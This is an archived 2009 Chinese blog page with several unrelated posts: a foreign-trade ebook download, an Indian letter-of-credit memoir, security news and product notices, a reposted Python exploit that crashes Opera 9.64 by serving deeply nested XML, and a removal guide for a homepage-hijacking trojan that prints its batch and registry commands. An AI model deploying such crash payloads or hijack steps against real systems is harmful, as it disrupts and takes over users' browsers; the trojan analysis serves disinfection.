2009年3月 的存档

外贸新人教材-《外贸七日通》word版免费下载

      外贸新人教材-《外贸七日通》word版免费下载
      简介:
      

引用内容 引用内容

  中小型企业如何自己做外贸出口?刚被聘用的外贸新手坐在电脑前面该干些什么?大学里深奥的国际贸易理论知识和实际工作中具体的外贸操作往往有很大的不同。《外贸七日通》即是一部沟通二者的外贸快速操作教程。
  本书针对当前中小型厂商外贸中“没有进出口权”和“通过互联网做外贸”两大普遍特点,完全以实际操作为范例,以“现学现用”为选材原则,从零开始一步步完成外贸的整个操作过程。教程共分七章,循序渐进。主要章节内容包括进出口权问题,外贸基础知识和最新知识,网上外贸及市场开发的具体操作,外贸单证的处理以及事故应对,国际货款结算,信用证审核与应用,国际货物运输操作等。
   本书偏重实务,外贸原理亦选择与现实密切相关的部分。并且重点讲述了外贸中常见的术语、行话和各类行业经验与小常识,这在行内往往是外贸高手秘而不宣的,对新手和业绩不佳者非常实用。
   作者本身即是一线出口商,常年开展网上外贸。本书中的范例几乎都是作者亲历,对外贸新手极具参考价值。


        目录:

        第一天:入门篇 从零开始,四步教你上手做外贸
        第二天:外贸第一步 外贸经营权
        第三天:外贸第二步 选择受欢迎的经销产品
        第四天:外贸第三步 破解外贸的三个关键秘密
        第五天:外贸第四步 利器速成法—-电脑与英语
        第六天:进阶篇 网商时代,一台电脑通天下
        第七天:登陆B2B国际贸易平台,主动出击发布广告

      虽然这本书定位于外贸新人,但在看了之后仍觉受益匪浅,因为这本书非常系统,了解了很多已经不曾了解的概念,特别是财务和法律上的。因此极力向各外贸同行推荐此书。
      本站(www.0point.cn)所提供下载仅作个人学习、研究之用,不得用于任何商业用途,版权归原作者和出版社所有。
下载文件 点击下载《外贸七日通》

收藏与分享

Opera 9.64 XML Parsing Remote Crash Exploit

    Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit

复制内容到剪贴板程序代码程序代码

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   – Similar to the bug found by Wojciech Pawlikowski for Firefox
#     -> http://www.milw0rm.com/exploits/8306
#
#   – Tested using the latest version of Opera (9.64)
#
#   Usage  : python opera.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = '<A>' * 7400
        exploit = '<xml>' + exploit + '</xml>'
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s …' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s …' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting …'
        except socket.error:
            print '
  • ERROR: a socket error has occurred …'
            sys.exit(-1)    
        except ValueError:
            print '
  • ERROR: invalid port number …'
            sys.exit(-1)
                
    if __name__ == '__main__':
        main()

    # milw0rm.com
  • [2009-03-30]

    收藏与分享

    中网S3最新免费版本3.6.0.1简介与下载

    来源:麦田守望者
    http://www.2000xg.com/

    中网S3是一款4D齐全的主动防御个人安全产品。
      (1)网络防护(Network Defense,简称ND):基于miniport的Windows的状态检测包过滤防火墙;基于TDI的应用访问网络控制防火墙;基于MAC的链路层ARP防火墙;Anti-DDOS防火墙。
      (2)应用防护(Application Defense,简称AD):在Windows上增加系统自主访问控制和基于规则的强制访问控制;应用作为主体的权限控制;应用作为客体的完整性保护。
      (3)文件防护(File Defense,简称FD):文件作为客体的完整性保护。
      (4)注册表防护(Registry Defense,简称RD):注册表作为客体的完整性保护。
      中网S3还是一款强大的4M系统监控工具。
      (1)自动启动监控(Autoruns Monitor,简称AM),监控对象包括:登录时运行的程序,资源管理器插件,IE浏览器插件,系统服务,驱动程序,计划任务,打印机监控,Winsock Providers ,LSA Providers ,Winlogon Notify,App Inits ,Known Dlls 等。
      (2)运行进程实时监控(Process Monitor,简称PM)。
      (3)网络状态实时监控(Netstat Monitor,简称NM)。
      (4)日志实时审计监控(Log Monitor,简称LM)。
      中网S3主机安全系统,可以解决网络攻击、网络入侵、僵尸网络、社会工程攻击、蠕虫病毒、间谍木马软件等系列安全问题。
      如果你需要:
      一款功能强大的Windows防火墙(FIREWALL),
      一款Windows主机入侵检测(HIDS)和防御系统(HIPS),
      一款Windows主机完整性保护软件(Integrity Protection),
      一款Windows蠕虫病毒免疫系统(Anti-WORM),
      一款积极防御的Windows的防间谍软件(Anti-SPYWARE)等,
      中网S3主机安全系统可能是你合适的选择。
      中网S3最新免费版本3.6.0.1下载:
      http://liveupdate.netchina.com.cn/s3v3_6/ncs3_3.6.0_setup.exe
      最近更新:
      2009-1-21
      更新内容:
      1.修改了与ncappctl相关在Windows 2003下面非白名单程序无界面主题的bug;
      2.修改了规则无法保存,ncdsgui.exe频繁写规则被拒绝,询问框不断弹出的bug;
      3.修改了几个和内存指针相关的bug。
      2009-1-19
      更新内容:
      1.针对这两天出现的bug,进行了修改,内容涉及检查PE文件头的有效性,其中有些指针没有检查。
      2.针对使用comodo提的clt.exe进行了测试,发现了一些问题,并做了针对性处理。
      2009-1-16
      更新内容:
      1.提供对vista的支持
      2.更新规则数据库引擎
      3.解决和360safebox软件的兼容性问题
      4.对最新的Matousec测评,提供更新版本
      5.增加对SetParent、AttachThreadInput等函数的拦截
      6.增加对拦截入口的检查和保护
      7.对规则的检查,减少冗余函数调用造成的性能损失
      8.通过DriverVerify测试,解决驱动和应用层交互中出现的bug
      9.对程序执行实现资源管理器扩展,允许用户以低用户权限级别执行程序

    收藏与分享

    印度信用证交单回忆录

          题记:这票信用证不是要求资料最多的,却是最让我伤神的一票。

          这篇日志是几天前就想写的,但截止昨天这一票交单资料终于从上海渣打银行寄出去,这单信用证才算做了一个了结。
          交易条款:FOB,客户指定货代,
          付款方式:20%前T/T,80% L/C
          这份证初到手上时,大致审了一遍,感觉没有什么问题,就安心的从头一条一条再详细审下来。
          …
          31C Date of issue
                 090213
          …
          31D Date and place of expire
                 090321 at China
          …
          44C Latest date of shipment
                 090228
          …
          48 Period for presentation
               20 days from the BL date but within the LC period  交单期在开船日20天以后,但须在信用证有效期之内
          看到重头戏,46A 要求单据
          01 Manually signed commercial onvoice – original plus three copies covering shipments/despatches purported to be xxx(采购设备型号) as per proforma invoice dated 13.11.08 issued by the beneficiary. 这句话把我看懵了,打电话给通知行,通知行的一哥们看了半天也没看明白,让我问开证人,问了客户,客户说只要在发票空白的地方把发票号码做上去就OK;
          02 Certificate of chine origin issued by chamber of commerce,产地证一份,实际后来把我害惨了,因为之前都是在商检局做的产地证,这一次要求在商会做。先到市贸促会注册,然后再到当地贸促会取证,取证让我跑了三趟,第一次因为空白证上要求盖蓝色章,第二次因为发票上也要盖蓝色章 (之前在商检局全部是红色章),第三次做足了准备,抄了U盘,条形章,并关照过同事不行就直接在家里改单重发,结果这次去了直接发证。
          03 Full set, signed, clean onboard, ocean bills of lading of a conference line vessel made out to order and blank endorsed marked fireight pyable at destination and notify the xxx(印度开证行名称及地址,我后来就把这个打到了所有单据的上面) and xxx(开证人) short form bill of lading and third party bill of lading or documents produced by reprographic process/computerised system, carbon copies marked original are not acceptable. 全套清洁正本海单,并需要做背书,短式提单和第三方提单以及以复印、电脑打印表明“原件”或者证实的单据不接受。这一条后面条款没见过,就扔给我们自己的货代,货代看过说只要一般的提单都可以满足这些条件,没问题,但既然是指定货代就八成只能开货代单,在跟货代确认后证实了这一点,准备跟客户沟通更改此条。
          04 A certificate to the effect that …. 船证明一份,让船公司直接开就是了。
          05 Inspection certificate…. 开证人开一份机器的质检证明。
          06 Packing list in three originals. 三份正本箱单。

          47A Additional conditions 附加条款
          …
          02 Our LC number, date and the name of issuing bank should be mentioned on all documents 所有单据注明信用证号码、日期、议付行名称。
          …
          05 The transport document
         …
               C) Must not contain the indication intended or similar qualification in relation to the vessel 船名不得使用预期标注,此条备查。
               D) Must be issued by the carrier or his agent and not by any freight forwarder. 好家伙,再次规定不要货代单,真不知客户是怎么想的。
               E) Must not contain a provision that goods may be carried on deck.  不得舱面卸货,此条备查。
          06 Lash transport documents are not acceptable  驳船运输单据不接受
          07 Transport documents bearing reference by stamp or other wise to cost additional to the freight charge are not acceptable  以戳记或其它方式提及运费以外的附加费用单据不接受, 此条备查。
          08 Short form or blank-back transport documents are not acceptable 短式提单和无条款提单不接受。

          78 Instr to pay/accep/neg 付款/接受/议付指示
          …
          The documents should be sent to us in the following address: xxx(出现的第二个印度银行,名称与前面的开证行一致,但地址不同), the documentary credit is subject to ucpdc 2007 revision ICC publication No. 600. 这里的指示一般都是给通知行看的,我就只是顺带扫了一眼。

          接下来跟客户商讨海单与货代单的问题,虽然客户邮件允诺接受货代单,但我仍然强烈要求对方将此条款添加到更改通知中,并在通知中删除 47A 05 D 条款,否则就会造成不符点;连带装船期延后,质检证明又我方开立,一起让客户发一个amendment过来。结果很快更改通知到了,一看让我苦笑不得,居然把信用证的Item No.搞错了,而且连着错了两个地方,本来46A要改的内容被放到了45A上。在延后装船期至2009.3.20后,信用证有效期居然没改,而且47A 05 D也没删掉,正打算找客户说呢,第三天,47A 05 D条款删除的通知不紧不慢的到了手上。就这样,两份更改通知到了手上。
          只得再次要求客户改单,要求添加一条 shipment made earlier to the date of amendment of this letter of credit is also acceptable.,因为按照某些银行的审单标准,开船日在未做说明的情况下不得早于信用证改单日,故做特别说明,并要求客户更改31D 的有效期到2009.4.15
    至此,改单完成,开始准备交单。
          由于是客户指定货代需要付款赎单,碰巧那几天负责出纳的财务家中有事,并带走了章和票据,没办法只能自己顶上去了,从财务预支了款直奔银行,直接汇到货代公司账上。
          后来拿到了提单和船证明,就把所有单据都交到了上海渣打,结果天津渣打一下子审出9个不符点,当时那个不爽,从来没遇到过这么
    多不符点的。
          主要问题有:
          没提交汇票(我从来不做,都是交给通知行做),所以这个不能算不符点;
          发票未显示"covering shipments…"一段话,狂晕,当初客户不是告诉我就显示一个形式发票号码就完了吗~;
          提单未显示" Conference line vessel",这一条我的货代没有告诉我要出在提单上,也没有告诉我是什么意思,后来指定货代告诉是国际班轮工会的意思,但实际上这个工会在去年就解散了,现在是怎么样都不能把这句话打上去,彻底无语,开证行的人都是吃白饭的?%&#@¥* 在第一时间联系客户征询意见之后,客户允诺接受这个不符点;
          船证明提单号和签章与提单不一致,当然不一致了,一个是海单,一个是货代单,一翻解释之后发现没用,人家只认单单一致;
          所有单据出现的议付行地址不正确,渣打告诉我51D的开证行并不是议付行,78里面的银行才是议付行,彻底晕倒,51D的银行委托78中的银行开证,想想自己当初何必画蛇添足,把银行的地址写上去呢?其实名称是一样的,只是地址不一样。
          OK,全套单据重做!
          说实话,这个指定货代态度大大出乎我的意料,免费给我重新签发了提单和船证明,这在指定货代中绝少,暗自庆幸。
          在两天时间之内(因为提单要改好几个地方,只能重新签发,重新签发之后需要给我背书,路上邮寄消耗一天时间)再次将全部单据提交到上海渣打,汇票还是交给他们做。负责我这一单的人很牛,银行里别的人上午9:00准时上班,我的这位仁兄到10:30还没到,中午好不容易联系上让给我做个汇票,下午天津渣打就审查出汇票中的受益人不对,当我说出是他们上海的同事做的时候,我们同时笑了起来,笑我这位仁兄真够牛的,只让他做个汇票都能做错。 赶紧打电话让他重做,结果是从下午12:30打到2:00还是找不到人,最后终于找到他一个同事答应帮我去找找他,最终把汇票的事情搞定了。
          天津审单的MM对我说,一定要在下午3:30之前完成所有的工作出单,也就是把全套单据寄到国外,这一天也是我答应客户的最晚日期了。偏偏这一天不巧,他们的电脑传真出了问题,因为需要我盖了章回传他们担保那个"Conference line vessel“的不符点指示,从下午2:30开始传,传到3:30对方都没收到,中间我传了N多遍,也换过传真机,但就是不行。结果到了下午3:35'的时候天津方面通知我收到指示传真,但已经晚了。当天单据肯定是不能寄出了。
          期间因为单据重做我跟客户解释过单据延迟出票,第一次是因为文件要修改,只要晚一天,当时设想的是上海的货代只要把提单改好了交给银行,而我可以在当天就把其他资料都改好给银行,这样只要晚一天;但后来因为提单需要重新签发,重新背书,多了一天快递的时间,这两次延迟客户都接受了;而船已经到了对方港口,晚了是要支付高昂滞港费的。这一天下午我的心情低到极点,为什么会有这么多碰巧的事,碰巧负责我们信用证的仁兄那么牛气,碰巧银行的传真系统与我们的不兼容。。。
          这中间还有N多细节,不想说了,仅这些文字我已经敲了3个小时,终于敲完了。
          希望我们在下周顺利收汇,终于见识到印度信用证的”魅力“了,折服。
          感谢各位能耐着性子把这篇文章看完,这篇日志既是为了方便其他首次做信用证的同行,希望有所帮助,也为了自己以后备查,顺带宣泄一些这些天来因为这些事情带来的情绪。

    收藏与分享

    安全聚焦:危机四伏的ATM取款机

          【IT专家网独家】随着攻击技术的日新月异,针对自动取款机的攻击事件已不再是新闻:我们见到过使用嗅探器攻击ATM,还有使用伪造身份(钓鱼攻 击)成功进入ATM,甚至有人利用物理手段攻击ATM。但是最近一种新的针对ATM的攻击方式(向ATM机器插入盗取信息的恶意代码),引起了所有人对 ATM安全的关注。
          Sophos最近研究发现,Diebold ATM机器中装有能够窃取用户信息的木马程序,Diebold公司在一月份针对其windows系统的Opteva ATM机发布了一项新的安全更新,当时已经表示在俄罗斯发现部分机器被物理性攻击并被渗透木马软件。 Diebold公司发言人表示,“我们立即通知全球范围内的客户关于该恶意软件的风险,并发布了风险防范软件更新,我们意识到俄罗斯发生的事件的危险性,攻击者通过在ATM所在位置物理进入ATM机器,然后让拥有专业黑客技术的攻击者安装恶意软件。” Sophos的资深技术顾问Graham Cluley表示,“攻击者十分精通ATM取款机内部软件,能够精通到这种程度确实让人刮目相看,他们知道API调用,了解现金机器的运行方式,攻击者的精心准备让我们颇为意外。” “这不是一般攻击者能够达到的水平,”他补充说,“他们首先需要真正进入到ATM机器中,需要有人在里面处理这些设备以进入系统并安装软件。” 目前还不清楚攻击者怎样进入取款机内部的,但是安全专家表示,这代表着一种对银行机器的全新攻击方式,而且这个可能只是整个攻击的皮毛而已。可能有许多地方的ATM被安装了这种类型的恶意隐藏木马。 Diebold公司在其对ATM机器的安全更新中对客户表示,攻击者已经被抓获,正在进行调查。一旦攻击者能够进行ATM机器内部,他们就能够植入恶意软件和拦截敏感数据。当windows管理密码被获取或者内置防火墙禁用时,这种攻击的风险就会增加。与此同时,Solidcore公司一月份时从其ATM客户处初次了解到Diebold攻击,Solidcore公司的OEM解决方案首席技术官 Kishore Yerrapragada表示,攻击者去年年底通过IP连接感染机器的,攻击者们非常熟悉ATM机器内部和外部的构造以及运行方式。专家表示,攻击者将机器转换到所谓的“维修或者系统模式”,这时候安全保护和加密就因为调试或者系统维护而被关闭,只有对系统内部非常了解的人才可能做到这一点,这能够使黑客通过木马获取ATM机器的数据。此次发现的木马软件能够收集PIN码以及所谓的Track 2加密数据(存储在ATM卡的磁条上),这能够使攻击者复制真正的ATM卡。然后攻击者会插入自己特质的卡到被木马感染的ATM机器进入帐户系统,取款机就会通过机器系统打印出被窃取的信息。
          Sophos的Cluley谈到攻击时说,“这种攻击方式的最大优势在于,你不能发现ATM机器被动过手脚,完全是在内部进行的。” 这种攻击与近日发生在欧洲的攻击相类似,大型连锁超市的几个结账读卡器被发现内置了嗅探器,攻击者在生产过程中就进行了安装,因此从外面根本看不出来被破坏了。专家透露,这些被攻击超市包括位于英国Asda的沃尔玛超市。然而,这种有针对性的ATM攻击不可能取代低成本、即插即用、全网络钓鱼攻击窃取银行帐户的攻击方式。大多数犯罪分子无法进入ATM机器内部,虽然这种方式十分诱人。这些攻击也暴露了这些取款机的安全弱点,Network Box的安全分析专家Simon Heron表示,“我希望看到ATM机器向支付处理器发送信息时通过SSL VPN加密或者某种VPN连接加密。这些ATM机器同样还需要更多的硬件保护,包括IDS/IPS防火墙等。” ATM机器中通常都会有运行时间和变化控制工具来检测可疑活动,因此系统不能只是进行周边防护,需要加强另一层防护以防止对系统的更改。 Sophos公司的Cluley说道,“这次的ATM攻击事件对于ATM制造商来说应该是一次警醒,所有生产ATM设备或者银行设备的厂商在创造和生产这些设备的时候需要确保这些系统是安全的,必须确保全过程没有被交换或者修改过。”

          0point后记:国内那些利用门禁系统轻松获取银行卡卡号的行为已经让我大为瞠目了,没想到国外已经开始在将ATM改造成养马场了,一句话:没有做不到,只有想不到。

    收藏与分享

    金山毒霸首推免费肉鸡检测器

    来源:cnbeta

          3月23日上午,金山毒霸云安全中心对外宣称,专门针对“肉鸡”电脑的“金山毒霸肉鸡检测器”已正式上线。该产品旨在为广大互联网用户解除越发严重的“肉鸡”威胁。由此,一场轰轰烈烈的“全民剿杀肉鸡”行动全面展开。金山毒霸反病毒专家李铁军表示,“从广义上讲,遭遇木马攻击的电脑均可以称为肉鸡。”金山毒霸云安全中心监测数据显示,截止至本月19日,09年以来全国累计超过3800万台次计算机遭遇木马攻击,其中专门针对网银的木马暴涨近10倍。互联网用户的财产安全面临巨大威胁。

        据悉,沦为“肉鸡”的电脑,除了央视315晚会曝光的网银帐号受到威胁外,黑客还可以轻易获得用户的炒股帐号、网游帐号密码等信息。此外,远程控制用户的摄像头,曝光隐私;窃取“肉鸡”电脑里的虚拟财产以及商业机密。李铁军表示,“肉鸡已经成为黑客牟利的工具”。

          为了维护整个互联网安全环境,让广大网民摆脱“肉鸡”威胁,金山毒霸紧急推出了“肉鸡检测器”,全面剿杀肉鸡。金山毒霸肉鸡检测器采用金山毒霸先进的可信 认证及威胁判断技术,准确鉴定文件安全性。多达156项病毒加载项的检测,已经覆盖病毒所有已经采用的加载技术,全面检测不遗漏;独有的Anti- rootkit技术深入系统底层,纵使采用了“隐身术”的后门或远程控制程序,也都在“肉鸡检测器”下乖乖现身。

          此外“肉鸡检测器”还采用加强版抢杀技术,强力清除顽固文件,所有毒瘤重启后瞬间灰飞烟灭。“金山毒霸肉鸡检测器还对于流行木马、后门破坏导致的系统异常,一键修复,真正做到用户的贴心小棉袄。”金山毒霸反病毒工程师表示。

          金山毒霸高级副总裁葛珂指出,“肉鸡已经成为威胁互联网安全的一个重要因素。作为安全厂商,金山有责任、有义务将权威的病毒信息提供给普通用户,让其具有防范意识,同时更为重要的是为用户提供切实的解决方案,全面解决用户问题。”

          业内人士指出,央视315晚会让广大用户认识了“肉鸡”,再加之各大媒体对病毒产业链的深入报道,一度让用户陷入了对网络安全的恐慌之中。金山适时推出“ 肉鸡检测器”产品,既能够切实帮助用户解决问题,同时也在一定程度上缓解用户的恐惧心理。对整个互联网安全起到积极作用。

          金山毒霸肉鸡检测器下载地址:http://www.duba.net/zt/rouji/
          
          正在猜想,这个肉鸡检测器与杀软、防木马软件有何不同之处呢?

    收藏与分享

    首页篡改虫Trojan.Win32.StartPage.sq(hao123.exe)分析与解决

    来源:麦田守望者的博客http://www.2000xg.com/
          基本介绍:该病毒以RAR打包,创建自解压文件,并使用自解压脚本命令解压并运行其他病毒文件,通过修改注册表恶意篡改主页为:http://www.xiushe.com。超级巡警建议用户使用超级巡警来防御查杀此类病毒。同时提醒广大用户及时更新病毒库,对该程序进行有效查杀。
      病毒相关分析:
      病毒名称:Trojan.Win32.StartPage.sq
      病毒别名:首页篡改虫
      病毒类型:木马类
      感染平台:Windows
      病毒大小:273,259 字节
      SHA1 :2527a13b7bcc7b40953821ce40277b5ef1e6aa20
      加壳类型:Rar
      开发工具:Microsoft Visual C++ 6.0
      病毒行为:
      1、病毒运行后通过自解压脚本命令,解压病毒文件到:
      Path=%windir%\system32
      自解压为以下病毒文件:
      “hao123.zip”,“go.bat”,“hao123.exe”,“lnternet Explorer.lnk”,文件夹“1”,文件夹“2”,文件夹“3”
      2、自解压的同时运行go.bat:
      @echo off
      start /min hao123.exe
      3、病毒文件hao123.exe运行后,添加以下注册表项及键值来达到篡改主页等目的:
      HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
      数值数据 "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5414.cn
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Start Page
      数值数据: www.111333.com.cn/?in=StarPage
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Search Page
      数值数据:www.111333.com.cn/?in=IESearch
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Search Bar
      数值数据:www.111333.com.cn/?in=IERSearch
      HKEY_CURRENT_USER\Software\Microsoft\Windows\
      CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
      数值名称:{871C5380-42A0-1069-A2EA-08002B30309D}
      数值数据: 1
      HKEY_CURRENT_USER\Software\Microsoft\Windows\
      CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
      数值名称:{871C5380-42A0-1069-A2EA-08002B30309D}
      数值数据: 1
      HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\
      IEXPLORE.EXE\shell\open\command
      数值数据:
      C:\\Program Files\Internet Explorer\
      iexplore.exe http://www.111333.com.cn/?in=startmenu
      4、删除以下注册表项:
      "reg delete HKEY_CLASSES_ROOT\piffile /v IsShortcut /f "
      "reg delete HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f "
      5、删除以下文件:
      del "%ALLUSERSPROFILE%\..\*Internet*.lnk" /s "
      del "%ALLUSERSPROFILE%\..\*Internet*.url" /s "
      6、分别复制解压出来的3个病毒文件夹内的文件到以下路径:
      xcopy "1\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\桌面\" /k /c /q /r /y
      xcopy "2\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\「开始」菜单\程序\" /k /c /q /r /y
      xcopy "3\lnternet Explorer.lnk" "%AppData%\Microsoft\Internet Explorer\Quick Launch" /k /c /q /r /y
      7、强行结束以下进程:
      taskkill /f /im explorer.exe
      taskkill /f /im IEXPLORE.EXE
      8、重命名以下文件,达到URL转向病毒指定网址的目的:
      rename %windir%\system32\shdoclc.dll shlos.rar
      rename %windir%\system32\hao123.zip shdoclc.dll
      替换的shdoclc.dll文件的stringtable的76目录项下的1211号资源字符串,实现“当用户在IE地址栏输入错误的时候,转向病毒设置URL="http://www.2d2.cn/?wd=%s&ie=utf-8&id=5"”
      9、cls清屏后,再打开explorer.exe:
      "cls"
      "%systemroot%\explorer.exe"
      解决方案:
      推荐方案:安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。
      超级巡警下载地址:http://www.sucop.com/download/16.html
      专杀下载地址:http://a1.sucop.com/killer/StartPage_killer.zip
      手工清除方法:
      1、结束病毒进程。打开超级巡警,选择进程管理功能,终止以下进程:
      hao123.exe
      2、删除病毒生成以下文件:
      Path=%windir%\system32
      “go.bat”,“hao123.exe”,“lnternet Explorer.lnk”“hao123.zip”,文件夹“1”,文件夹“2”,文件夹“3”
      3、把被病毒修改过的注册表项按照如下修改:
      HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
      数值数据 "C:\Program Files\Internet Explorer\iexplore.exe"
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Start Page
      数值数据: about:blank
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Search Page
      数值数据:
      http://www.microsoft.com/isapi/redir.dllprd=ie&;ar=iesearch
      HKEY_CURRENT_USER\Software\Microsoft\Windows\
      CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
      数值名称:{871C5380-42A0-1069-A2EA-08002B30309D}
      数值数据: 0
      HKEY_CURRENT_USER\Software\Microsoft\Windows\
      CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
      数值名称:{871C5380-42A0-1069-A2EA-08002B30309D}
      数值数据: 0
      HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\
      IEXPLORE.EXE\shell\open\command
      数值数据:
      "C:\Program Files\Internet Explorer\iexplore.exe"
      4、删除以下注册表键值:
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      数值名称:Search Bar
      数值数据:www.111333.com.cn/?in=IERSearch
      5、添加以下注册表项键值:
      HKEY_CLASSES_ROOT\piffile /v IsShortcut /f
      HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f
      6、新建文本文档写入如下内容,并保存为sucop.bat,运行
      rename %windir%\system32\shlos.rar shdoclc.dll
      rename %windir%\system32\shdoclc.dll sq.rar
      7、删除以下文件:
      xcopy "1\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\桌面\" /k /c /q /r /y
      xcopy "2\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\「开始」菜单\程序\" /k /c /q /r /y
      xcopy "3\lnternet Explorer.lnk" "%AppData%\Microsoft\Internet Explorer\Quick Launch" /k /c /q /r /y
      用正常文件来恢复以下文件:
      %ALLUSERSPROFILE%\..\*Internet*.lnk
      %ALLUSERSPROFILE%\..\*Internet*.url
      8、建议用户使用超级巡警的恶意网站屏蔽功能屏蔽以下网址:
      hxxp://www.xiushe.com
      hxxp://www.2d2.cn
      hxxp://www.111333.com.cn
      hxxp://www.5414.cn

          看来这个病毒作者对注册表和IE有相当了解
    ,并依此作为突破口攻陷用户电脑权限。

    收藏与分享